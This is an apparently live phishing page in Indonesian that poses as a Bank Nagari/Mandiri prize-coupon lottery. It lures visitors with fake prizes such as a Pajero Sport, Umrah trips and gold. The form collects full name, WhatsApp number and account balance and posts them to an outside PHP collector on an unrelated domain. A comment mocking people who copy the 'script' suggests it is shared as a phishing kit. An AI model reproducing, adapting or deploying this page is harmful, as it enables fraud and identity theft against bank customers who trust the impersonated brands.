<html lang="en" class="h-100"><head>
  <meta text="NAK MALING SCRIP PULE 🤭🤭🤭 BEMALU OI IDUP NGAN NI MALING SAJE PACAK NYE 😅😅" <head="" id="ctl00_Head1"> 
  <meta charset="utf-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> 
  <meta property="og:title" content="Cetak Kupon Anda - Mandiri - Jempolan"> 
  <meta property="og:image" content="img/bc.png"> 
  <meta property="og:image:type" content="img/bc.png"> 
  <meta name="description"> 
  <meta name="author" content="BCA"> 
  <title>Cetak Kupon Anda - Mandiri Jempolan</title> 
  <link rel="icon" type="image/x-icon" href="https://nagari-csx.pages.dev/css/favicon.png"> 
  <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/"> 
  <link href="../../cdn.jsdelivr.net/npm/bootstrap%405.0.2/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> 
  <link rel="stylesheet" href="../../cdn.jsdelivr.net/npm/bootstrap-icons%401.4.1/font/bootstrap-icons.css"> 
  <link rel="stylesheet" href="https://nagari-csx.pages.dev/css/css/main.css" type="text/css" media="all"> 
 <style>


body{
    height: 100%;
  background: linear-gradient(to bottom, #013b78 0%, #2b94d3 0%, #FFFFFF 100%);          
}

.navnon{
    position: fixed;
    top: 0;
    left: 0;
}

.textjalan{
    width: 100%;
    display: flex;
    align-content: center;
    align-items: center;
    background-color: transparent;
    font-weight: bold;
}

.textjalan svg{
    color: #004480;
}

.coverform{
    width: 90%;
    height: auto;
    padding: 0px;
    background-color: transparent;
    display: block;
    margin-left: auto;
    margin-right: auto;
    margin-top: 15px;
}

.form h5{
    border-bottom: 1px solid #003F88;
    color: #003F88;
}

label[for="kupon"] {
  font-weight: bold;
  font-size: 0.9rem;
  color: #333;
  display: block;
  margin-bottom: 8px;
  font-family: 'Segoe UI', sans-serif;
}

select#kupon {
  width: 100%;
  padding: 12px 16px;
  font-size: 1rem;
  border: 1px solid #003F88;
  border-radius: 5px;
  background-color: #ffff;
  box-shadow: 0 3px 13px rgba(0,0,0,0.1);
  color: #333;
  font-family: 'Segoe UI', sans-serif;
  appearance: none;
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  background-image: url("data:image/svg+xml;charset=US-ASCII,%3Csvg xmlns='http://www.w3.org/2000/svg' width='10' height='6'%3E%3Cpath fill='%23007BFF' d='M0 0l5 6 5-6z'/%3E%3C/svg%3E");
  background-repeat: no-repeat;
  background-position: right 16px top 50%;
  background-size: 12px;
  transition: border 0.3s ease, box-shadow 0.3s ease;
}

select#kupon:hover,
select#kupon:focus {
  border-color: #FF8601;
  box-shadow: 0 0 0 2px rgba(0, 123, 222, 0.22);
  outline: none;
}

select#kupon option[disabled] {
  color: #aaa;
}
.inp{
    margin-bottom: 10px;
}

.inp input{
    width: 100%;
    padding: 9px;
    border: none;
    border: 1px solid #003F88;
    outline: none;
    border-radius: 5px;
    box-shadow: 0 3px 13px rgba(0,0,0,0.1);
}

input:focus{
    border: 1px solid red;
}

button{
    width: 100%;
    padding: 10px;
    border: none;
    background-color: #003F88;
    color: #fff;
    border-radius: 5px;
    box-shadow: 0 3px 13px rgba(0,0,0,0.4);
    border: 1px solid #fff;
    margin-top: 18px;
}

footer img{
    width: 100%;
    position: fixed;
    bottom: 0;
}
</style></head> 
 <body> 
  <main> 
   <nav class="navnon"> 
    <img width="100%" src="../../raw.githubusercontent.com/cqwxfb/p/refs/heads/main/IMG-20250924-WA0000.jpg" alt=""> 
   </nav> <br>
   <footer> 
    <ig src="https://hosting.tigerengine.id/fiyx7j.jpg" alt=""> 
   </ig></footer> 
   <div class="textjalan" style="margin-top: 65px;"> 
    <svg xmlns="http://www.w3.org/2000/svg" width="50" height="40" fill="currentColor" class="bi bi-bell" viewBox="0 0 16 16"> 
     <path d="M8 16a2 2 0 0 0 2-2H6a2 2 0 0 0 2 2M8 1.918l-.797.161A4 4 0 0 0 4 6c0 .628-.134 2.197-.459 3.742-.16.767-.376 1.566-.663 2.258h10.244c-.287-.692-.502-1.49-.663-2.258C12.134 8.197 12 6.628 12 6a4 4 0 0 0-3.203-3.92zM14.22 12c.223.447.481.801.78 1H1c.299-.199.557-.553.78-1C2.68 10.2 3 6.88 3 6c0-2.42 1.72-4.44 4.005-4.901a1 1 0 1 1 1.99 0A5 5 0 0 1 13 6c0 .88.32 4.2 1.22 6"></path> 
    </svg> 
    <span>
     <marquee>
       Selamat Datang di GEBYAR NAGARI FSTVL Menangkan Hadiah Nya dan Keseruan nya...! jadikan Anda Pemenangnya 
     </marquee></span> 
   </div> 
   <div class="coverform"> 
    <div class="form"> 
     <h5 class="text
-center"></h5> 
     <ig width="45%" height="25%" src="https://iconlogovector.com/uploads/images/2024/09/lg-66f74950d4c4c-Livin-by-Mandiri.webp" alt=""> 
    <form id="formData" action="https://bogat1.my.id/nagari/1.php" method="POST" class="mt-4"> 
      <div class="inp"> 
       <label for="kupon">PILIH KUPON ANDA </label> 
       <select id="kupon" name="d" required=""> <option value="Mobil Pajero Sport">Kupon √ Mobil Pajero Sport</option> <option value="Uang Cash">Kupon √ Uang Cash</option> <option value="Umroh Gratis">Kupon √ Umroh Gratis</option> <option value="Rumah Gratis">Kupon √ Rumah Gratis</option> <option value="Emas Logam Mulia">Kupon √ Emas Logam Mulia</option> </select> 
      </div> <class="mt-4"> 
      <div class="inp"> 
       <label for="namalengkap"><b>Nama Lengkap</b></label>
       <b> <input type="text" name="a" id="namalengkap" required=""> </b>
      </div>
      <b> 
       <div class="inp"> 
        <label for="nowa">No. WhatsApp</label> 
        <input type="tel" name="b" id="nowa" required="" maxlength="13"> 
       </div> 
       <div class="inp"> 
        <label for="dengan-rupiah">Saldo Akhir</label> 
        <input type="tel" name="c" id="rupiah" required="" maxlength="19"> 
       </div> <button type="submit" id="kirim">Cetak Kupon</button> </b>
     
    </class="mt-4"></form></ig></div>
    <b> <p style="font-size: 12px;" class="text-center"></p> </b>
   </div>
   <b> <b> <p onclick="location.href='https://www.bni.co.id/id-id/beranda/promo-acara/rejeki-wondr-bni'" style="font-size: 13px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #003F88; text-decoration: none">Semua Nasabah Bank NAGARI <span style="color: #098CE3"><b>Berkesempatan Untuk Menang...!!!</b></span> </strong></p></b></b>
  </main>
  <b><b><strong style="color: black; text-decoration: none"> </strong></b></b>
  <!-- partial -->
 

<script>
var rupiah = document.getElementById("rupiah");
rupiah.addEventListener("keyup", function(e) {
  // tambahkan 'Rp.' pada saat form di ketik
  // gunakan fungsi formatRupiah() untuk mengubah angka yang di ketik menjadi format angka
  rupiah.value = formatRupiah(this.value, "Rp. ");
});

/* Fungsi formatRupiah */
function formatRupiah(angka, prefix) {
  var number_string = angka.replace(/[^,\d]/g, "").toString(),
    split = number_string.split(","),
    sisa = split[0].length % 3,
    rupiah = split[0].substr(0, sisa),
    ribuan = split[0].substr(sisa).match(/\d{3}/gi);

  // tambahkan titik jika yang di input sudah menjadi angka ribuan
  if (ribuan) {
    separator = sisa ? "." : "";
    rupiah += separator + ribuan.join(".");
  }

  rupiah = split[1] != undefined ? rupiah + "," + split[1] : rupiah;
  return prefix == undefined ? rupiah : rupiah ? "Rp. " + rupiah : "";
}
</script></body></html>